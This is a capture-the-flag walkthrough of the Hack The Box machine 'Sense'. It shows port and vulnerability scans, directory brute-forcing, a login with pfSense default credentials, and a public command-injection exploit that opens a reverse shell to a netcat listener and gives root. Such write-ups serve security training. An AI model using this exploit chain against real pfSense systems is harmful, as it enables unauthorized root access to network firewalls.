Sense
Contents
Network scan
root@kali:~/HTB/Machines/Sense# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.60 --rate=1000
Starting masscan 1.0.5 at 2019-11-20 15:22:09 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 443/tcp on 10.10.10.60 Discovered open port 80/tcp on 10.10.10.60
Nmap output
root@kali:~/HTB/Machines/Sense# nmap -A -T4 -v 10.10.10.60 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 10:22 EST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 10:22 Completed NSE at 10:22, 0.00s elapsed Initiating NSE at 10:22 Completed NSE at 10:22, 0.00s elapsed Initiating NSE at 10:22 Completed NSE at 10:22, 0.00s elapsed Initiating Ping Scan at 10:22 Scanning 10.10.10.60 [4 ports] Completed Ping Scan at 10:22, 0.10s elapsed (1 total hosts) Initiating SYN Stealth Scan at 10:22 Scanning sense.htb (10.10.10.60) [1000 ports] Discovered open port 443/tcp on 10.10.10.60 Discovered open port 80/tcp on 10.10.10.60 Completed SYN Stealth Scan at 10:22, 4.92s elapsed (1000 total ports) Initiating Service scan at 10:22 Scanning 2 services on sense.htb (10.10.10.60) Completed Service scan at 10:23, 14.10s elapsed (2 services on 1 host) Initiating OS detection (try #1) against sense.htb (10.10.10.60) Retrying OS detection (try #2) against sense.htb (10.10.10.60) Initiating Traceroute at 10:23 Completed Traceroute at 10:23, 0.06s elapsed Initiating Parallel DNS resolution of 2 hosts. at 10:23 Completed Parallel DNS resolution of 2 hosts. at 10:23, 0.20s elapsed NSE: Script scanning 10.10.10.60. Initiating NSE at 10:23 Completed NSE at 10:23, 31.31s elapsed Initiating NSE at 10:23 Completed NSE at 10:24, 60.05s elapsed Initiating NSE at 10:24 Completed NSE at 10:24, 0.00s elapsed Nmap scan report for sense.htb (10.10.10.60) Host is up (0.044s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: lighttpd/1.4.35 |_http-title: Did not follow redirect to https://sense.htb/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 443/tcp open ssl/https? |_ssl-date: TLS randomness does not represent time Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|general purpose Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (86%), FreeBSD 8.X (85%) OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/o:freebsd:freebsd:8.1 Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.0 (86%), FreeBSD 8.1 (85%), OpenBSD 4.3 (85%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.001 days (since Wed Nov 20 10:23:03 2019) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: Randomized
TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 44.11 ms 10.10.14.1 2 44.21 ms sense.htb (10.10.10.60)
NSE: Script Post-scanning. Initiating NSE at 10:24 Completed NSE at 10:24, 0.00s elapsed Initiating NSE at 10:24 Completed NSE at 10:24, 0.00s elapsed Initiating NSE at 10:24 Completed NSE at 10:24, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 115.41 seconds Raw packets sent: 2089 (95.600KB) | Rcvd: 189 (160.206KB)
Vulnerabilities scan
root@kali:~/HTB/Machines/Sense# nmap -p443 --script vuln 10.10.10.60 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 10:25 EST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for sense.htb (10.10.10.60) Host is up (0.045s latency).
PORT STATE SERVICE 443/tcp open https |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug) | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the "CCS Injection" vulnerability. | | References: | http://www.openssl.org/news/secadv_20140605.txt | http://www.cvedetails.com/cve/2014-0224 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA | Modulus Type: Non-safe prime | Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup | Modulus Length: 1024 | Generator Length: 1024 | Public Key Length: 1024 | References: |_ https://weakdh.org | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. | Disclosure date: 2014-10-14 | Check results: | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA | References: | https://www.openssl.org/~bodo/ssl-poodle.pdf | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.securityfocus.com/bid/70574 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 |_sslv2-drown:
Nmap done: 1 IP address (1 host up) scanned in 149.82 seconds
Web enumeration
Diresearch
At first, I did the mistake to scan port 80 instead of port 443 wasting a lot of time. The application pfSense, is found on port 443 (port 80 redirects to port 443). The application is written in php.
root@kali:~/HTB/Machines/Sense# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u https://10.10.10.60
_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-20_11-48-37.log
Target: https://10.10.10.60
SSL Error connecting to server. Try the -b flag to connect by hostname
Task Completed
Curl
When I try to fetch the page, we have this issue.
root@kali:~# curl -v https://10.10.10.60 * Trying 10.10.10.60:443... * TCP_NODELAY set * Connected to 10.10.10.60 (10.10.10.60) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: none CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (OUT), TLS alert, bad certificate (554): * SSL certificate problem: EE certificate key too weak * Closing connection 0 curl: (60) SSL certificate problem: EE certificate key too weak More details here: https://curl.haxx.se/docs/sslcerts.html
curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above.
This is related to the previous vulnerabilities found. We can by-pass this issue with curl using the -k modifier, we use dirbuster instead of dirsearch.
Dirbuster
root@kali:~/HTB/Machines/Sense# cat DirBusterReport-10.10.10.60-443.txt DirBuster 1.0-RC1 - Report http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project Report produced on Wed Nov 20 11:59:28 EST 2019 --------------------------------
https://10.10.10.60:443 -------------------------------- Directories found during testing:
Dirs found with a 200 response:
/ /tree/
Dirs found with a 302 response:
/installer/
-------------------------------- Files found during testing:
Files found with a 200 responce:
/index.php /changelog.txt /themes/pfsense_ng/javascript/niftyjsCode.js /csrf/csrf-magic.js /javascript/jquery.js /tree/tree.js /system-users.txt
--------------------------------
The file system-users.txt seems very interesting.
root@kali:~/HTB/Machines/Sense# curl -k https://10.10.10.60/system-users.txt ####Support ticket###
Please create the following user
username: Rohit password: company defaults
A quick look at https://docs.netgate.com/pfsense/en/latest/usermanager/pfsense-default-username-and-password.html shows us the default user pfsense admin password pfsense
Login into the application
We try user rohit and password pfsense.
Search exploit
root@kali:~/HTB/Machines/Sense# searchsploit pfsense
----------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------- ----------------------------------------
pfSense - 'interfaces.php?if' Cross-Site Scripting | exploits/hardware/remote/35071.txt
pfSense - 'pkg.php?xml' Cross-Site Scripting | exploits/hardware/remote/35069.txt
pfSense - 'pkg_edit.php?id' Cross-Site Scripting | exploits/hardware/remote/35068.txt
pfSense - 'status_graph.php?if' Cross-Site Scripting | exploits/hardware/remote/35070.txt
pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit) | exploits/unix/remote/43193.rb
pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/remote/34985.txt
pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution | exploits/php/webapps/23901.txt
pfSense 2.1 build 20130911-1816 - Directory Traversal | exploits/php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities | exploits/php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal | exploits/php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution | exploits/php/webapps/43128.txt
pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery | exploits/php/webapps/41501.txt
pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit) | exploits/php/remote/43341.rb
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting | exploits/php/webapps/46538.txt
pfSense 2.4.4-p1 - Cross-Site Scripting | exploits/multiple/webapps/46316.txt
pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting | exploits/php/webapps/46936.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities | exploits/php/webapps/39709.txt
pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery | exploits/php/webapps/39306.html
pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery | exploits/php/webapps/39695.txt
pfSense UTM Platform 2.0.1 - Cross-Site Scripting | exploits/freebsd/webapps/24439.txt
----------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
The exploit 43560 fits for us.
root@kali:~/HTB/Machines/Sense# searchsploit -m 43560
Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
URL: https://www.exploit-db.com/exploits/43560
Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /root/HTB/Machines/Sense/43560.py
Open Listener
root@kali:~/HTB/Machines/Sense# rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Run the exploit
root@kali:~/HTB/Machines/Sense# python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.34 --lport 4444 --username rohit --password pfsense CSRF token obtained Running exploit... Exploit completed
Reverse shell on the listener
root@kali:~/HTB/Machines/Sense# rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.60. Ncat: Connection from 10.10.10.60:33076. sh: can't access tty; job control turned off # whoami root
User flag
# cd /home # ls -l total 8 drwxrwxr-x 2 root operator 512 Oct 14 2017 .snap drwxr-xr-x 2 rohit nobody 512 Oct 14 2017 rohit # cat rohit/user.txt <USER_FLAG>
Root flag
# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 18:03, 21 November 2019 (EST)
